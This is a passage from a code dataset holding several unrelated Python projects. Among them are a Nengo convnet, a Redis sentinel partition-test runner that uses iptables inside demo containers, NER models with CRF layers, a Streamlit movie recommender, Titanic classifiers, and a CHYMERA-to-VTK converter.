np.arange(source_shape[1]*source_shape[2])\n\n items.shape = source_shape[1:]\n layer = []\n while j + h <= source_shape[1]:\n row = []\n i = 0\n while i + w <= source_shape[2]:\n if use_separate_nodes:\n sp = nengo.Node(None, size_in=w*h*source_shape[0],\n label='[%d:%d,%d:%d]' % (j,j+h,i,i+w))\n row.append([sp]) \n\n indices = np.array((items[j:j+h][:,i:i+w]).flat)\n all_indices = []\n for q in range(source_shape[0]):\n all_indices.extend(indices+q*source_shape[1]*source_shape[2])\n \n if use_separate_nodes:\n nengo.Connection(self.input[all_indices], sp)\n else:\n row.append([self.input[all_indices]])\n\n i += spatial_stride[0]\n j += spatial_stride[1]\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append((source_shape[0],\n spatial_size[0],\n spatial_size[1]))\n \n def make_middle_layer(self, n_features, n_parallel,\n n_local, kernel_stride, kernel_size, padding='valid',\n use_neurons=True, init=nengo.dists.Uniform(-1,1)):\n with self.net:\n prev_layer = self.layers[-1]\n prev_output_shape = self.output_shapes[-1]\n layer = []\n for prev_row in prev_layer:\n row = []\n for prev_col in prev_row:\n col = []\n this_index = 0\n \n index = 0\n for k in range(n_parallel):\n prev_index = 0\n if isinstance(init, nengo.dists.Distribution):\n this_inits = [init] * n_local\n else:\n this_inits = []\n prev_size = init.shape[2] // n_local\n\n for i in range(n_local):\n\n this_init = init[:,:,prev_index:prev_index+prev_size,\n this_index:this_index+n_features]\n prev_index = (prev_index + prev_size)\n this_inits.append(this_init)\n this_index = (this_index + n_features)\n\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[0])\n if use_neurons:\n ens = nengo.Ensemble(conv.output_shape.size, dimensions=1,\n label='%s' % conv.output_shape)\n ens_neurons = ens.neurons\n else:\n ens = nengo.Node(None, size_in=conv.output_shape.size,\n label='%s' % conv.output_shape)\n ens_neurons = ens\n for kk in range(n_local):\n prev_k = prev_col[index%len(prev_col)]\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[kk])\n nengo.Connection(prev_k, ens_neurons, transform=conv)\n index += 1\n col.append(ens_neurons)\n row.append(col)\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append(conv.output_shape)\n \n def make_output_layer(self, dimensions):\n with self.net:\n self.output = nengo.Node(None, dimensions, label='output')\n for row in self.layers[-1]:\n for col in row:\n for k in col:\n nengo.Connection(k, self.output,\n transform=nengo_dl.dists.Glorot())\n \n def make_merged_output(self, shape):\n with self.net:\n self.output = nengo.Node(None, size_in=shape[0]*shape[1], label='output')\n indices = np.arange(shape[0]*shape[1]).reshape(shape)\n\n count = np.zeros(self.output.size_out)\n\n patch_shape = self.output_shapes[-1].shape\n assert patch_shape[0] == 1\n i = 0\n j = 0\n for row in self.layers[-1]:\n for n in row:\n assert len(n) == 1\n n = n[0]\n items = indices[j:j+patch_shape[2],i:i+patch_shape[1]]\n nengo.Connection(n, self.output[items.flatten()])\n count[items.flatten()] += 1\n i += patch_shape[1]\n j += patch_shape[2]\n i = 0\n assert count.min() == count.max() == 1\n\n","repo_name":"tcstewar/davis_tracking","sub_path":"davis_tracking/spatial_convnet.py","file_name":"spatial_convnet.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"13192126746","text":"\"\"\"\nA simple demo for closer\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport time\n\nimport docker\nimport redis\nimport redis.asyncio as async_redis\n\n\nclass Runner:\n def __init__(self, stop_closer=False):\n self.docker_client = docker.from_env()\n self.containers = self.discover_containers()\n self.tasks = {}\n self._should_stop_closer = stop_closer\n self.log = logging.getLogger(__name__)\n self.counter = 1\n self.recorded = set()\n\n async def run_load(self, target):\n \"\"\"\n Run test load against target\n \"\"\"\n while True:\n try:\n conn = async_redis.Redis(host=target, socket_timeout=0.1)\n await conn.ping()\n # Actually we are running in single thread here\n # So no locks/atomics are required\n value = self.counter\n self.counter += 1\n await conn.set(f'{value}', '1')\n self.recorded.add(f'{value}'.encode('utf-8'))\n except asyncio.CancelledError:\n return\n except Exception as exc:\n self.log.debug('Inserting for %s failed: %r', target, exc)\n await asyncio.sleep(0.1)\n\n def discover_containers(self):\n \"\"\"\n Get a map of name -> docker container\n \"\"\"\n res = {}\n for container in self.docker_client.containers.list():\n if container.labels.get('com.docker.compose.project') == 'poor-man-redis-closer':\n service = container.labels['com.docker.compose.service']\n if 'host' not in service:\n continue\n res[service] = container\n return res\n\n def stop_closer(self):\n \"\"\"\n Stop closer in containers\n \"\"\"\n for name, container in self.containers.items():\n res = container.exec_run('supervisorctl stop closer')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to stop closer in {name}: {res.output}')\n\n def wait_redis(self):\n \"\"\"\n Wait for host1 to become primary with 2 replicas\n \"\"\"\n timeout = 60\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n ready = True\n conn = redis.Redis(host='host1')\n info = conn.info('replication')\n if info['connected_slaves'] != 2:\n ready = False\n for host in ['host2', 'host3']:\n replica_conn = redis.Redis(host=host)\n info = replica_conn.info('replication')\n if info['master_link_status'] != 'up':\n ready = False\n sentinel_conn = redis.Redis(host=host, port=26379)\n replicas = sentinel_conn.sentinel_slaves('demo')\n if len(replicas) != 2:\n ready = False\n sentinel_conn = redis.Redis(host='host2', port=26379)\n status = sentinel_conn.sentinel_sentinels('demo')\n if len(status) != 2:\n ready = False\n if ready:\n return\n except Exception as exc:\n self.log.warning('Waiting for redis to become ready: %r', exc)\n time.sleep(1)\n raise RuntimeError('host1 is not ready')\n\n def wait_single_primary(self):\n \"\"\"\n Wait for single primary with 2 replicas\n \"\"\"\n timeout = 180\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n primaries = []\n for name in self.containers:\n conn = redis.Redis(host=name, socket_timeout=0.1)\n info = conn.info('replication')\n if info['role'] == 'master':\n primaries.append(name)\n if len(primaries) == 1:\n return primaries[0]\n self.log.info('Waiting for single primary. Primaries: %s', ', '.join(primaries))\n except Exception as exc:\n self.log.debug('Waiting for single primary: %r', exc)\n time.sleep(1)\n raise RuntimeError('No single primary after network healing')\n\n def isolate(self, target):\n \"\"\"\n Isolate container from other hosts\n \"\"\"\n target_container = self.containers[target]\n addr = target_container.attrs['NetworkSettings']['Networks']['poor-man-redis-closer_default']['IPAddress']\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run(f'iptables -t filter -I INPUT -s {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {name} from {target}')\n res = container.exec_run(f'iptables -t filter -I OUTPUT -d {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {target} from {name}')\n\n def open(self, target):\n \"\"\"\n Open container for other hosts\n \"\"\"\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run('iptables -t filter -F INPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {name} for {target}')\n res = container.exec_run('iptables -t filter -F OUTPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {target} for {name}')\n\n def count_lost(self, primary):\n \"\"\"\n Count lost record\n \"\"\"\n conn = redis.Redis(host=primary)\n on_primary = set(conn.keys())\n lost = self.recorded.difference(on_primary)\n print(f'Lost keys {len(lost)}/{len(self.recorded)}')\n\n async def load(self):\n \"\"\"\n Async part of run\n \"\"\"\n for host in self.containers:\n self.tasks[host] = asyncio.create_task(self.run_load(host))\n print('Isolating host1')\n self.isolate('host1')\n print('Waiting for 10 minutes')\n await asyncio.sleep(600)\n for task in self.tasks.values():\n task.cancel()\n\n def run(self):\n \"\"\"\n Run demo\n \"\"\"\n self.wait_redis()\n if self._should_stop_closer:\n self.stop_closer()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(self.load())\n self.open('host1')\n print('Waiting for single primary after network heal')\n primary = self.wait_single_primary()\n self.count_lost(primary)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-closer', action='store_true', help='Stop closer before running load')\n args = parser.parse_args()\n runner = Runner(args.no_closer)\n runner.run()\n","repo_name":"secwall/poor-man-redis-closer","sub_path":"demo/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22271083811","text":"import torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch import nn, optim\nfrom torchcrf import CRF\n\nfrom transformers import RobertaModel\n\n\nclass LstmNerModel(nn.Module):\n def __init__(self, embedding_size=256, num_tags=41,\n vocab_size=3675, hidden_size=128,\n batch_first=True, dropout=0.1):\n super(LstmNerModel, self).__init__()\n self.batch_first = batch_first\n self.embedding = nn.Embedding(vocab_size, embedding_size, dtype=torch.float32)\n\n self.lstm = nn.LSTM(embedding_size, hidden_size // 2,\n num_layers=2, batch_first=True,\n bidirectional=True, dropout=dropout)\n for name, param in self.lstm.named_parameters():\n if name.startswith(\"weight\"):\n nn.init.xavier_normal_(param)\n else:\n nn.init.zeros_(param)\n\n self.fc = nn.Linear(hidden_size, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor, seq_lens):\n input_tensor = self.embedding(input_tensor)\n total_length = input_tensor.size(1) if self.batch_first else input_tensor.size(0)\n input_packed = pack_padded_sequence(input_tensor, seq_lens, batch_first=self.batch_first, enforce_sorted=False)\n output_lstm, hidden = self.lstm(input_packed)\n output_lstm, length = pad_packed_sequence(output_lstm, batch_first=self.batch_first, total_length=total_length)\n output_fc = self.fc(output_lstm)\n return output_fc\n\n def compute_loss(self, input_tensor, tags, seq_lens):\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n output_fc = self.forward(input_tensor, seq_lens)\n\n loss = -self.crf(output_fc, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor, seq_lens):\n out = self.forward(input_tensor, seq_lens)\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n\n\nclass BertNerModel(nn.Module):\n def __init__(self,\n\n num_tags=41,\n batch_first=True,\n ):\n super(BertNerModel, self).__init__()\n self.batch_first = batch_first\n\n self.model = RobertaModel.from_pretrained(\"hfl/chinese-roberta-wwm-ext\")\n self.fc = nn.Linear(768, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor):\n input_tensor = self.model(input_tensor)\n input_tensor = self.fc(input_tensor.last_hidden_state)\n return input_tensor\n\n def compute_loss(self, input_tensor, tags):\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n output = self.forward(input_tensor)\n loss = -self.crf(output, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor):\n out = self.forward(input_tensor)\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n","repo_name":"liwenju0/chinese_ner_bert_lstm_crf","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44800500923","text":"\"\"\"\n\n Streamlit webserver-based Recommender Engine.\n\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Please follow the instructions provided within the README.md file\n located within the root of this repository for guidance on how to use\n this script correctly.\n\n NB: !! Do not remove/modify the code delimited by dashes !!\n\n This application is intended to be partly marked in an automated manner.\n Altering delimited code may result in a mark of 0.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n\tapplication. You are expected to extend certain aspects of this script\n and its dependencies as part of your predict project.\n\n\tFor further help with the Streamlit framework, see:\n\n\thttps://docs.streamlit.io/en/latest/\n\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib,os\n\n# Data handling dependencies\nimport pandas as pd\nimport numpy as np\nimport streamlit.components.v1 as components\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\n\n# Custom Libraries\nfrom utils.data_loader import load_movie_titles\nfrom recommenders.collaborative_based import collab_model\nfrom recommenders.content_based import content_model\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n# Data Loading\ntitle_list = load_movie_titles('resources/data/movies.csv')\n\n# App declaration\ndef main():\n\n html_template = \"\"\"\n
    \n

    EDSA Movie Recommendation Challenge

    \n

    UNSUPERVISED LEARNING PREDICT - TEAM1

    \n
    \n \"\"\"\n\n title_template =\"\"\"\n
    \n

    UNSUPERVISED LEARNING PREDICT

    \n

    TEAM 1

    \n

    Malibongwe Xulu

    \n

    Nthabiseng Moela

    \n

    Simangele Maphanga

    \n

    Kgauhelo Mokgawa

    \n

    Manko Mofokeng

    \n

    14 December 2020

    \n
    \n \"\"\"\n\n # DO NOT REMOVE the 'Recommender System' option below, however,\n # you are welcome to add more options to enrich your app.\n page_options = [\"Home\",\"Recommender System\",\"About\",\"Exploratory Data Analysis\",\"Solution Overview\"]\n\n # -------------------------------------------------------------------\n # ----------- !! THIS CODE MUST NOT BE ALTERED !! -------------------\n # -------------------------------------------------------------------\n page_selection = st.sidebar.selectbox(\"Choose Option\", page_options)\n if page_selection == \"Recommender System\":\n # Header contents\n st.write('# Movie Recommender Engine')\n st.write('### EXPLORE Data Science Academy Unsupervised Predict')\n st.image('resources/imgs/Image_header.png',use_column_width=True)\n # Recommender System algorithm selection\n sys = st.radio(\"Select an algorithm\",\n ('Content Based Filtering',\n 'Collaborative Based Filtering'))\n\n # User-based preferences\n st.write('### Enter Your Three Favorite Movies')\n movie_1 = st.selectbox('First Option',title_list[14930:15200])\n movie_2 = st.selectbox('Second Option',title_list[25055:25255])\n movie_3 = st.selectbox('Third Option',title_list[21100:21200])\n fav_movies = [movie_1,movie_2,movie_3]\n\n # Perform top-10 movie recommendation generation\n if sys == 'Content Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = content_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n if sys == 'Collaborative Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = collab_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n # -------------------------------------------------------------------\n\n # ------------- SAFE FOR ALTERING/EXTENSION -------------------\n \n if page_selection == \"Home\":\n st.markdown(html_template.format('royalblue','white'), unsafe_allow_html=True)\n st.image('resources/imgs/Home.PNG',use_column_width=True) \n #st.markdown(title_template, unsafe_allow_html=True)\n\n if page_selection == \"About\":\n #markup(page_selection)\n st.write(\"### Oveview: Flex your Unsupervised Learning skills to generate movie recommendations\")\n \n # You can read a markdown file from supporting resources folder\n #if st.checkbox(\"Introduction\"):\n st.subheader(\"Introduction to Unsupervised Learning Predict\")\n st.write(\"\"\"In today’s technology driven world, recommender systems are socially and economically critical for ensuring that individuals can make appropriate choices surrounding the content they engage with on a daily basis. One application where this is especially true surrounds movie content recommendations; where intelligent algorithms can help viewers find great titles from tens of thousands of options.\"\"\")\n st.write(\"\"\"With this context, EDSA is challenging you to construct a recommendation algorithm based on content or collaborative filtering, capable of accurately predicting how a user will rate a movie they have not yet viewed based on their historical preferences.\"\"\")\n st.write(\"\"\"Providing an accurate and robust solution to this challenge has immense economic potential, with users of the system being exposed to content they would like to view or purchase - generating revenue and platform affinity.\"\"\")\n\n #if st.checkbox(\"Problem Statement\"):\n st.subheader(\"Problem Statement of the Unsupervised Learning Predict\")\n st.write(\"Build recommender systems to recommend a movie\")\n\n #if st.checkbox(\"Data\"):\n st.subheader(\"Data Overview\")\n st.write(\"\"\"This dataset consists of several million 5-star ratings obtained from users of the online MovieLens movie recommendation service. The MovieLens dataset has long been used by industry and academic researchers to improve the performance of explicitly-based recommender systems, and now you get to as well!\"\"\")\n\n st.write(\"\"\"For this Predict, we'll be using a special version of the MovieLens dataset which has enriched with additional data, and resampled for fair evaluation purposes.\"\"\")\n\n st.write(\"\"\"### Source:\"\"\") \n st.write(\"\"\"The data for the MovieLens dataset is maintained by the GroupLens research group in the Department of Computer Science and Engineering at the University of Minnesota. Additional movie content data was legally scraped from IMDB\"\"\")\n\n\n st.write(\"\"\"### Supplied Files:\n genome_scores.csv - a score mapping the strength between movies and tag-related properties. Read more here\n\n genome_tags.csv - user assigned tags for genome-related scores\n\n imdb_data.csv - Additional movie metadata scraped from IMDB using the links.csv file.\n\n links.csv - File providing a mapping between a MovieLens ID and associated IMDB and TMDB IDs.\n\n sample_submission.csv - Sample of the submission format for the hackathon.\n\n tags.csv - User assigned for the movies within the dataset.\n\n test.csv - The test split of the dataset. Contains user and movie IDs with no rating data.\n\n train.csv - The training split of the dataset. Contains user and movie IDs with associated rating data.\"\"\")\n\n # st.subheader(\"Raw Twitter data and label\")\n # if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n # st.write(raw[['sentiment', 'message']]) # will write the df to the page\n\n if page_selection == \"Exploratory Data Analysis\":\n st.title('Exploratory Data Analysis')\n\n if st.checkbox(\"ratings\"):\n st.subheader(\"Movie ratings\")\n st.image('resources/imgs/rating.PNG',use_column_width=True)\n\n # if st.checkbox(\"correlation\"):\n # st.subheader(\"Correlation between features\")\n # st.image('resources/imgs/correlation.png',use_column_width=True)\n \n if st.checkbox(\"genre wordcloud\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/genre_wordcloud.png',use_column_width=True)\n \n if st.checkbox(\"genres\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/top_genres.PNG',use_column_width=True)\n \n # if st.checkbox(\"movies released per year\"):\n # st.subheader(\"Movies released per year\")\n # st.image('resources/imgs/release_year.png',use_column_width=True)\n\n if st.checkbox(\"tags\"):\n st.subheader(\"Top tags\")\n st.image('resources/imgs/top_tags.PNG',use_column_width=True)\n\n if st.checkbox(\"cast\"):\n st.subheader(\"Popular cast\")\n st.image('resources/imgs/cast.PNG',use_column_width=True)\n\n # if page_selection == \"Recommend a movie\":\n # st.title(\"Recommend a movie\")\n # sys = st.radio(\"Select an algorithm\",\n # ('Content Based Filtering',\n # 'Collaborative Based Filtering'))\n\n\n if page_selection == \"Solution Overview\":\n st.title(\"Solution Overview\")\n st.write(\"RMSE of the recommendation models to show their performance\")\n st.image('resources/imgs/performance_df.PNG',use_column_width=True)\n\n\n # You may want to add more sections here for aspects such as an EDA,\n # or to provide your business pitch.\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Simangele101/unsupervised-predict-streamlit-template","sub_path":"edsa_recommender.py","file_name":"edsa_recommender.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70591919475","text":"# https://www.tutorialspoint.com/python/tk_button.htm\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.geometry('500x300+1000+500')\n\n\n# 1st Example\ndef check_time():\n btn_time['text'] = time.strftime('%H:%M:%S')\n print(time.strftime('%H:%M:%S'))\n\n\nbtn_time = Button(root, text='Check Time', command=check_time)\nbtn_time.pack()\n\n\n# 2nd Example\nroot.title('Counter')\nclicks = 0\n\n\ndef counter():\n global clicks\n clicks += 1\n root.title(f'Counter: {clicks}')\n\n\nbtn_cnt = Button(root, text='Counter', command=counter)\nbtn_cnt.pack()\n\n\nroot.mainloop()\n","repo_name":"bigalex95/tkinterExamples","sub_path":"tkinter/tkinterExamples/lesson3/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73097507955","text":"# -*- coding:UTF-8 -*-\n\"\"\"\nTrain models and show the results\n@author: ZhaoHe\n\"\"\"\nimport os\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom src.data import Data\nfrom src.config import train_path, test_path, submission_sample, submission_dir, images_dir\nfrom src.classifiers import classifier_xgboost, classifier_dicisionTree, classifier_SVM\nfrom src.clusters import cluster_KMeans, cluster_Hierarchical, cluster_Spectral\n\ndef get_submission(pred, model_name):\n submission_df = pd.read_csv(submission_sample, header=0)\n for i in range(len(pred)):\n submission_df.ix[i,'Survived'] = pred[i]\n out_file = os.path.join(submission_dir, model_name)\n submission_df.to_csv(out_file, index=False)\n\ndef pca(X_multi_dim):\n pca_model = PCA(n_components=2)\n X_2_dim = pca_model.fit_transform(X_multi_dim)\n return X_2_dim\n\ndef plot_result(pca_X, label_Y, title):\n class0_x, class0_y = [], []\n class1_x, class1_y = [], []\n for i in range(len(pca_X)):\n if label_Y[i] == 0:\n class0_x.append(pca_X[i][0])\n class0_y.append(pca_X[i][1])\n elif label_Y[i] == 1:\n class1_x.append(pca_X[i][0])\n class1_y.append(pca_X[i][1])\n plt.plot(class0_x, class0_y, 'or', label='No-Survived')\n plt.plot(class1_x, class1_y, 'ob', label='Survived')\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(images_dir, title))\n plt.close()\n\n\ndef train_models(train_X, train_Y, test_X):\n # Classify using Xgboost\n pred_Y = classifier_xgboost(train_X, train_Y, test_X)\n get_submission(pred_Y, 'xgboost')\n\n # Classify using decisionTree\n pred_Y = classifier_dicisionTree(train_X, train_Y, test_X)\n get_submission(pred_Y, 'decisionTree')\n\n # Classify using SVM\n pred_Y = classifier_SVM(train_X, train_Y, test_X)\n get_submission(pred_Y, 'SVM')\n\n # Cluster using KMeans\n pred_Y = cluster_KMeans(train_X, test_X)\n get_submission(pred_Y, 'KMeans')\n\n # Cluster using Herichical\n pred_Y = cluster_Hierarchical(test_X)\n get_submission(pred_Y, 'Hierachical')\n\n # Cluster using Spectral\n pred_Y = cluster_Spectral(test_X)\n get_submission(pred_Y, 'Spectral')\n\ndef visualize_models(train_X, train_Y, test_X):\n # PCA on X\n new_train_X = pca(train_X)\n new_test_X = pca(test_X)\n\n # Visualize the train set\n plot_result(new_train_X, train_Y, 'Train Set')\n\n # Visualize the Xgboost\n sub_file = os.path.join(submission_dir, 'Xgboost')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Xgboost')\n\n # Visualize the decisionTree\n sub_file = os.path.join(submission_dir, 'decisionTree')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'DecisionTree')\n\n # Visualize the SVM\n sub_file = os.path.join(submission_dir, 'SVM')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'SVM')\n\n # Visualize the KMeans\n sub_file = os.path.join(submission_dir, 'KMeans')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'KMeans')\n\n # Visualize the Hierachical\n sub_file = os.path.join(submission_dir, 'Hierachical')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Hierahical')\n\n # Visualize the Spectral\n sub_file = os.path.join(submission_dir, 'Spectral')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Spectral')\n\n\n\n\nif __name__ == \"__main__\":\n data = Data()\n train_X, train_Y = data.load_data(train_path)\n test_X = data.load_data(test_path, train = False)\n\n #train_models(train_X, train_Y, test_X)\n visualize_models(train_X, train_Y, test_X)","repo_name":"zhaohe1995/BIT2018-DataMiningHomework","sub_path":"Homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44877835735","text":"n = int(input())\nmistakes = 0\ncorrectdict = {}\nfor i in range(n):\n x, s = input().split()\n correctdict[x] = s\nfor i in range(n):\n x,s = input().split()\n if sorted(correctdict[x]) != sorted(s):\n mistakes += 1\n \nprint(mistakes)","repo_name":"nikhiljsk/Programming","sub_path":"Competitive Prog/Hackerearth/cyphsept/hungryowleagle.py","file_name":"hungryowleagle.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19233097341","text":"__author__ = 'jacob'\nimport pyvtk, math, os\nfrom glob import glob\nimport numpy\n#import visit_writer\n\nfilename = 'chymera_data.vtk'\ntitle = 'Test CHYMERA Output'\n\n\nNX = 256\nNZ = 66\nNY = 128\n\n\ndef BlendPoint(A, B, t):\n return [(1. - t) * A[0] + t * B[0], (1. - t) * A[1] + t * B[1], (1. - t) * A[2] + t * B[2]]\n\n\ndef GetMeshPoints(angle, angle2):\n p = []\n for k in range(NZ):\n z = float(k) / float(NZ - 1)\n for j in range(NY):\n y = float(j) / float(NY - 1)\n for i in range(NX):\n x = float(i) / float(NX - 1)\n A = [y * math.cos(angle), y * math.sin(angle), z]\n B = [y * math.cos(angle2), y * math.sin(angle2), z]\n p += BlendPoint(A, B, x)\n return p\n\n\ndef GetMeshConnectivity():\n c = []\n for k in range(NZ - 1):\n for j in range(NY - 1):\n for i in range(NX - 1):\n # Make a hole\n if i == 1 and j == 2:\n continue\n\n i0 = k * NY * NX + j * NX + i\n i1 = k * NY * NX + j * NX + (i + 1)\n i2 = k * NY * NX + (j + 1) * NX + (i + 1)\n i3 = k * NY * NX + (j + 1) * NX + i\n\n i4 = (k + 1) * NY * NX + j * NX + i\n i5 = (k + 1) * NY * NX + j * NX + (i + 1)\n i6 = (k + 1) * NY * NX + (j + 1) * NX + (i + 1)\n i7 = (k + 1) * NY * NX + (j + 1) * NX + i\n\n c.append([i0, i1, i2, i3, i4, i5, i6, i7])\n return c\n\n\ndef ReadGridData(filename):\n grid_data = []\n with open(filename, 'r') as data_file:\n for line in data_file:\n grid_data.append(float(line))\n return grid_data\n\n\ndef GetGridData():\n '''\n Gets the data from the output of binaryReader\n :return: A list of lists of grid data\n '''\n grid_data = []\n set_of_grids = glob(pathname=\"./GridData*.txt\")\n print(\"Getting Grid Data\")\n for grid in set_of_grids:\n grid_data.append(ReadGridData(grid))\n print(\"Finished GridData\")\n return grid_data\n\n\ndef GetMetaData():\n filename = os.path.join(\"MetaDataVTK.txt\")\n meta_data = ReadGridData(filename=filename)\n return meta_data\n\n\ndef WriteProxyDataset():\n filename = \"chymeraData.visit\"\n with open(filename, \"wt\") as all_data:\n all_data.write(\"!NBLOCKS 360\\n\")\n\n #f = open(\"test.visit\", \"wt\")\n #f.write(\"!NBLOCKS 360\\n\")\n # Get the mesh 6 times and add it all up.\n #all_pts = []\n #size_of_grid = NZ*NX*NY\n #connections_size = 8*size_of_grid\n #print(connections_size)\n #points_size = 3*size_of_grid\n # Create memmaps to deal with Python running out of memory\n #all_conn = numpy.memmap(os.path.join(\"/media/jacob/New Volume/\",\"connections.memmap\"), mode=\"w+\", dtype=\"int\", shape=(connections_size, connections_size))\n #all_pts = numpy.memmap(\"points.memmap\", mode=\"w+\", dtype=\"float16\", shape=(points_size, points_size))\n #all_var = []\n #pts_length = 0\n #conn_length = 0\n values = GetGridData()\n for i in range(360):\n pts = []\n conn = []\n angle = math.radians(float(i) * 1.)\n angle2 = math.radians(float(i + 1) * 1.)\n pts += GetMeshPoints(angle, angle2)\n conn += GetMeshConnectivity()\n var = []\n grid = pyvtk.UnstructuredGrid(points=pts, hexahedron=conn)\n print(\"Finished Unstructured Grid\")\n # Get the GridData\n end_point = int(i + (len(pts) - 1 / 3))\n print(int(i + ((len(pts) -1) / 3)))\n celldata = pyvtk.CellData(pyvtk.Scalars(values[0][i:end_point], name=\"data1\"),\n pyvtk.Scalars(values[1][i:end_point], name=\"data2\"),\n pyvtk.Scalars(values[2][i:end_point], name=\"data3\"),\n pyvtk.Scalars(values[3][i:end_point], name=\"data4\"),\n pyvtk.Scalars(values[4][i:end_point], name=\"data5\"),)\n\n vtk = pyvtk.VtkData(grid, celldata, title)\n vtk.tofile(\"chymera%d.vtk\\n\" % i)\n all_data.write(\"chymera%d\\n\" % i)\n print(\"Done in i range\" + str(i))\n\n\nWriteProxyDataset()","repo_name":"jacobbieker/chymera-vis","sub_path":"chymeraToVTK.py","file_name":"chymeraToVTK.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26225827723","text":"from .universal import ContainerMeta\n\n\nclass LEVY_AREA_APPROXIMATIONS(metaclass=ContainerMeta): # noqa\n none = \"none\" # Don't compute any Levy area approximation\n space_time = \"space-time\" # Only compute an (exact) space-time Levy area\n davie = \"davie\" # Compute Davie's approximation to Levy area\n foster = (\n \"foster\" # Compute Foster's correction to Davie's approximation to Levy area\n 